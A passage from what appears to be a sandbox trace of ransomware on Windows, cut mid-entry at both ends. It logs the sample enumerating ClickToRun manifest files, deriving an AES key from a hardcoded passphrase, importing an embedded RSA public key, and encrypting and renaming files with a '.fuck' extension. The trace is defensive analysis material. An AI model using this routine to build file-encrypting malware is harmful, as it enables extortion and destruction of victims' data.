(lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.280] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.gsg")) returned 0 [0236.281] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.fuck")) returned 0 [0236.281] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.281] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.281] CryptReleaseContext (hProv=0x2800640, dwFlags=0x0) returned 1 [0236.281] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.281] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.281] GetLastError () returned 0x5 [0236.281] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml")) returned 0x20 [0236.282] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.283] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.283] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.283] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.283] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28005b8) returned 1 [0236.288] CryptCreateHash (in: hProv=0x28005b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.288] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.288] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.288] CryptDeriveKey (in: hProv=0x28005b8, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0236.288] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.288] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.288] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27fff58) returned 1 [0236.289] CryptImportPublicKeyInfo (in: hCryptProv=0x27fff58, dwCertEncodingType=0x1, pInfo=0x27f7a58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7a88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7a90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb1a0) returned 1 [0236.289] CryptEncrypt (in: hKey=0x27eb1a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.290] CryptEncrypt (in: hKey=0x27eb1a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2800750*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2800750*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.290] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2800750, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.290] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.290] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.290] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.290] CloseHandle (hObject=0xffffffff) returned 1 [0236.290] CloseHandle (hObject=0xffffffff) returned 1 [0236.290] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.290] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.291] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.gsg")) returned 0 [0236.291] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.fuck")) returned 0 [0236.291] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.291] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0236.291] CryptReleaseContext (hProv=0x28005b8, dwFlags=0x0) returned 1 [0236.292] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.292] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.292] GetLastError () returned 0x5 [0236.292] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml")) returned 0x20 [0236.292] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml", dwFileAttributes=0x80) returned 0 [0236.292] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.293] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.293] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.293] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28000f0) returned 1 [0236.298] CryptCreateHash (in: hProv=0x28000f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.298] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.298] CryptHashData (hHash=0x27ebce0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.298] CryptDeriveKey (in: hProv=0x28000f0, Algid=0x6610, hBaseData=0x27ebce0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0236.298] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.298] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.298] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2800178) returned 1 [0236.299] CryptImportPublicKeyInfo (in: hCryptProv=0x2800178, dwCertEncodingType=0x1, pInfo=0x27f7cc8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7cf8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7d00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb3e0) returned 1 [0236.299] CryptEncrypt (in: hKey=0x27eb3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.299] CryptEncrypt (in: hKey=0x27eb3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2800288*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2800288*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2800288, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.300] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.300] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.300] CloseHandle (hObject=0xffffffff) returned 1 [0236.300] CloseHandle (hObject=0xffffffff) returned 1 [0236.300] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), bFailIfExists=0) returned 0 [0236.300] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml", dwFileAttributes=0x0) returned 0 [0236.300] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.gsg")) returned 0 [0236.301] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.fuck")) returned 0 [0236.301] CryptDestroyHash (hHash=0x27ebce0) returned 1 [0236.301] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0236.301] CryptReleaseContext (hProv=0x28000f0, dwFlags=0x0) returned 1 [0236.301] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.301] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.301] GetLastError () returned 0x5 [0236.301] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml")) returned 0x20 [0236.301] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml", dwFileAttributes=0x80) returned 0 [0236.302] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.302] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.302] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.302] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ffa08) returned 1 [0236.306] CryptCreateHash (in: hProv=0x27ffa08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.306] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.307] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.307] CryptDeriveKey (in: hProv=0x27ffa08, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.307] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.307] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.307] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28000f0) returned 1 [0236.308] CryptImportPublicKeyInfo (in: hCryptProv=0x28000f0, dwCertEncodingType=0x1, pInfo=0x27f7b28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7b58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7b60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb460) returned 1 [0236.308] CryptEncrypt (in: hKey=0x27eb460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.308] CryptEncrypt (in: hKey=0x27eb460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2800398*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2800398*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.308] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2800398, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.309] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.309] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.309] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.309] CloseHandle (hObject=0xffffffff) returned 1 [0236.309] CloseHandle (hObject=0xffffffff) returned 1 [0236.309] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), bFailIfExists=0) returned 0 [0236.309] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml", dwFileAttributes=0x0) returned 0 [0236.310] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.gsg")) returned 0 [0236.310] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.fuck")) returned 0 [0236.310] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.310] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.310] CryptReleaseContext (hProv=0x27ffa08, dwFlags=0x0) returned 1 [0236.310] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.310] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.310] GetLastError () returned 0x5 [0236.311] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: 